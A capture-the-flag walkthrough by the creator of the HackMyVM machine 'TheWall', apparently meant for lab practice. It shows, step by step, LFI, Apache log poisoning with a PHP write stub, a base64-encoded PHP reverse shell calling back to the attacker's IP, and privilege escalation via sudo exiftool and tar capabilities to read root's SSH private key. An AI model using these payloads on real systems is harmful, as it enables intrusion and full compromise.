NOTES ABOUT TheWall
[ 2022-10-20 ] [ HackMyVM / TheWall ]Status: Developed by me
Skills: Port Scanning, Fuzz, WAF Evasion, LFI, Log Poisoning & RCE, SUDO Misconfiguration, OpenSSL, Modified Capabilities Exploitation
Tools: nmap, ssh, gobuster, nc, exiftool, tar, ssh-keygen, getcap
PORT SCANNING
$ nmap -T4 -sCSV -p- 10.0.2.31
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 89:60:29:db:68:6d:13:34:98:b9:d0:17:24:56:a8:9e (RSA)
| 256 66:58:51:6d:cd:3a:67:46:36:56:9a:31:a0:08:13:cf (ECDSA)
|_ 256 f7:34:9e:53:68:ba:c2:06:ab:14:c3:21:90:2d:6e:64 (ED25519)
80/tcp open http Apache httpd 2.4.54 ((Debian))
|_http-title: Site doesn\'t have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.54 (Debian)
GETTING IN
THE WEB SERVER HAS A WAF THAT RESPONSE 403 ERROR IF
MAXIMUM OF "NOT FOUND REQUESTS" PER MINUTE IS OVERPASSED
$ gobuster -q dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php -u http://10.0.2.31 --delay 1s -t 1
/index.php (Status: 200) [Size: 25]
/includes.php (Status: 200) [Size: 2]
FUZZING TO GET PARAMETER (NO 404 ERRORS, NO WAF)
$ gobuster -q fuzz -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.0.2.31/includes.php?FUZZ=/etc/passwd --exclude-length 2
Found: [Status=200] [Length=1460] http://10.0.2.31/includes.php?display_page=/etc/passwd
/etc/passwd
root:x:0:0:root:/root:/bin/bash
john:x:1000:1000:,,,:/home/john:/bin/bash
SEARCHING FILES WITH [LFI-Digger] APACHE LOG IS READABLE
$ python2 lfidigger.py "http://10.0.2.31/includes.php?display_page=%LFI%" ./dics/linux_apache_logs.txt false
[+] /var/log/apache2/access.log - http://10.0.2.31/includes.php?display_page=/var/log/apache2/access.log
10.0.2.15 - - [19/Oct/2022:20:00:23 -0400] "GET / HTTP/1.0" 200 192 "-" "-"
10.0.2.15 - - [19/Oct/2022:20:00:23 -0400] "GET /nmaplowercheck1666234825 HTTP/1.1" 404 192 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.0.2.15 - - [19/Oct/2022:20:00:23 -0400] "POST / HTTP/1.1" 200 192 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.0.2.15 - - [19/Oct/2022:20:00:23 -0400] "GET /.git/HEAD HTTP/1.1" 404 192 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.0.2.15 - - [19/Oct/2022:20:00:23 -0400] "OPTIONS / HTTP/1.1" 200 192 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
APACHE'S LOG POISONING
nc 10.0.2.31 80
GET <?php file_put_contents('/tmp/rshell.php',base64_decode($_GET['e'])); ?>
BROWSE: PAYLOAD EXECUTION.
SENDING A PHP REVERSE SHELL BASE64 ENCODED TO BE WRITE.
includes.php?display_page=/var/log/apache2/access.log&e=PD9waHAgc2V0X3RpbWVfbGltaXQoMCk7JGlwPScxMC4wLjIuMTUnOyRwb3J0PTgwOyRjaHVua19zaXplPTE0MDA7JHdyaXRlX2E9bnVsbDskZXJyb3JfYT1udWxsOyRzaGVsbD0ndW5hbWUgLWE7IHc7IGlkOyAvYmluL3NoIC1pJztjaGRpcigiLyIpO3VtYXNrKDApOyRzb2NrPWZzb2Nrb3BlbigkaXAsJHBvcnQsJGVycm5vLCRlcnJzdHIsMzApO2lmKCEkc29jayl7ZXhpdCgxKTt9JGRlc2NyaXB0b3JzcGVjPWFycmF5KDA9PmFycmF5KCJwaXBlIiwiciIpLDE9PmFycmF5KCJwaXBlIiwidyIpLDI9PmFycmF5KCJwaXBlIiwidyIpKTskcHJvY2Vzcz1wcm9jX29wZW4oJHNoZWxsLCRkZXNjcmlwdG9yc3BlYywkcGlwZXMpO2lmKCFpc19yZXNvdXJjZSgkcHJvY2Vzcykpe2V4aXQoMSk7fXN0cmVhbV9zZXRfYmxvY2tpbmcoJHBpcGVzWzBdLDApO3N0cmVhbV9zZXRfYmxvY2tpbmcoJHBpcGVzWzFdLDApO3N0cmVhbV9zZXRfYmxvY2tpbmcoJHBpcGVzWzJdLDApO3N0cmVhbV9zZXRfYmxvY2tpbmcoJHNvY2ssMCk7d2hpbGUoMSl7aWYoZmVvZigkc29jaykpe2JyZWFrO31pZihmZW9mKCRwaXBlc1sxXSkpe2JyZWFrO30kcmVhZF9hPWFycmF5KCRzb2NrLCRwaXBlc1sxXSwkcGlwZXNbMl0pOyRudW1fY2hhbmdlZF9zb2NrZXRzPXN0cmVhbV9zZWxlY3QoJHJlYWRfYSwkd3JpdGVfYSwkZXJyb3JfYSxudWxsKTtpZihpbl9hcnJheSgkc29jaywkcmVhZF9hKSl7JGlucHV0PWZyZWFkKCRzb2NrLCRjaHVua19zaXplKTtmd3JpdGUoJHBpcGVzWzBdLCRpbnB1dCk7fWlmKGluX2FycmF5KCRwaXBlc1sxXSwkcmVhZF9hKSl7JGlucHV0PWZyZWFkKCRwaXBlc1sxXSwkY2h1bmtfc2l6ZSk7ZndyaXRlKCRzb2NrLCRpbnB1dCk7fWlmKGluX2FycmF5KCRwaXBlc1syXSwkcmVhZF9hKSl7JGlucHV0PWZyZWFkKCRwaXBlc1syXSwkY2h1bmtfc2l6ZSk7ZndyaXRlKCRzb2NrLCRpbnB1dCk7fX1mY2xvc2UoJHNvY2spO2ZjbG9zZSgkcGlwZXNbMF0pO2ZjbG9zZSgkcGlwZXNbMV0pO2ZjbG9zZSgkcGlwZXNbMl0pO3Byb2NfY2xvc2UoJHByb2Nlc3MpOyA/PiAK
REVERSE SHELL CALL:
includes.php?display_page=/tmp/rshell.php
ELEVATING PRIVILEGES
$ nc -lvnp 80
listening on [any] 80 ...
connect to [10.0.2.15] from (UNKNOWN) [10.0.2.31] 45696
Linux TheWall 5.10.0-18-amd64 #1 SMP Debian 5.10.140-1 (2022-09-02) x86_64 GNU/Linux
20:37:07 up 38 min, 0 users, load average: 0.01, 0.14, 0.24
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can\'t access tty; job control turned off
$ sudo -l
Matching Defaults entries for www-data on TheWall:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on TheWall:
(john : john) NOPASSWD: /usr/bin/exiftool
GENERATE SSH KEYS WITH ssh-keygen.
WRITE SSH AUTHORIZED KEY VIA SUDO EXIFTOOL
$ echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC1J8I2muaN7E3Nz8vhOnNmr/kX8knzKMxI9ryz9w/vPnt7gSBp/Acp5LJ1/hhNb1/DabcZSIo5qWUHZURupfc8M7pYGrTPD/ovnxsJOimVZiTaL0uQu1LtDCUkd4fWaa9yXrmXGOxQ9Jcs8VrSOm1fM10a3DV1KRfoczXgf2OKPFBvkUeRoHGl6fmXPAuCDFum5ELzq+KLd4f9id6MbmHs67af2SwslhbSlnrKEWLhrunoo59QQXT3FHaOdKTee1OMh0vqcMgKJPSpTDQpqQjRlAr9Glsf/Sh2NLZk5TjHD1ipqDPUi56fiGAtBjxTRSwQQCfpAoTI1aMCynz8BPXxhA9kfjr8Q9cc+ujJJGOgGBr9qF68DzRLjsqarl2JhWL8tx2X0xBlb3WbLjd5qS3QqpJuotAtZncrrayKAKsvY2wAa3D6aR1nz2n4+tQvqX4OeUU6IutIbZe7ndK5OEQRoczGvFaljlvzFercBgaLiKWHsg80BJ3ZRmG0bw0MhTE= kali@kali" > /tmp/id_rsa.pub
$ sudo -u john /usr/bin/exiftool -filename=/home/john/.ssh/authorized_keys /tmp/id_rsa.pub
$ exit
$ ssh john@10.0.2.31 -i id_rsa #connect with key
john@TheWall:~$ cat user.txt
SEARCH FILES THAT BELONG TO USER'S GROUP
john@TheWall:~$ find / -xdev -group 1000 2>/dev/null
/home/john
/home/john/.bash_logout
/home/john/.local
/home/john/.local/share
/home/john/.local/share/nano
/home/john/.bashrc
/home/john/.profile
/home/john/user.txt
/home/john/.ssh
/home/john/.ssh/authorized_keys
/home/john/.bash_history
/var/lib/sudo/lectured/john
/usr/sbin/tar
SEARCH FOR FILES WITH MODIFIED CAPABILITIES
john@TheWall:~$ /sbin/getcap -r / 2>/dev/null
/usr/sbin/tar cap_dac_read_search=ep
/usr/bin/ping cap_net_raw=ep
USE TAR CAPABILITIES TO READ ROOT'S PRIVATE KEY
john@TheWall:~$ /sbin/tar cf id_rsa.tar /id_rsa
/sbin/tar: Removing leading `/ from member names
john@TheWall:~$ tar xf id_rsa.tar
john@TheWall:~$ cat id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEAvgS2V50JB5doFy4G99JzapbZWie7kLRHGrsmRk5uZPFPPtH/m9xS
FPJMi5x3EWnrUW6MpPE9I3tT1EEaA/IoDApV1cn7rw7dt9LkEJrWn/MfsXr5B1wGzof66V
[...]
CONNECT USING PRIVATE KEY
$ chmod 0400 ./private_root
$ ssh root@10.0.2.31 -i private_root
root@TheWall:~# cat r0Ot.txT
root@TheWall:~# init 0
I HOPE YOU HAVE ENJOYED THIS VM
Regards,
Claor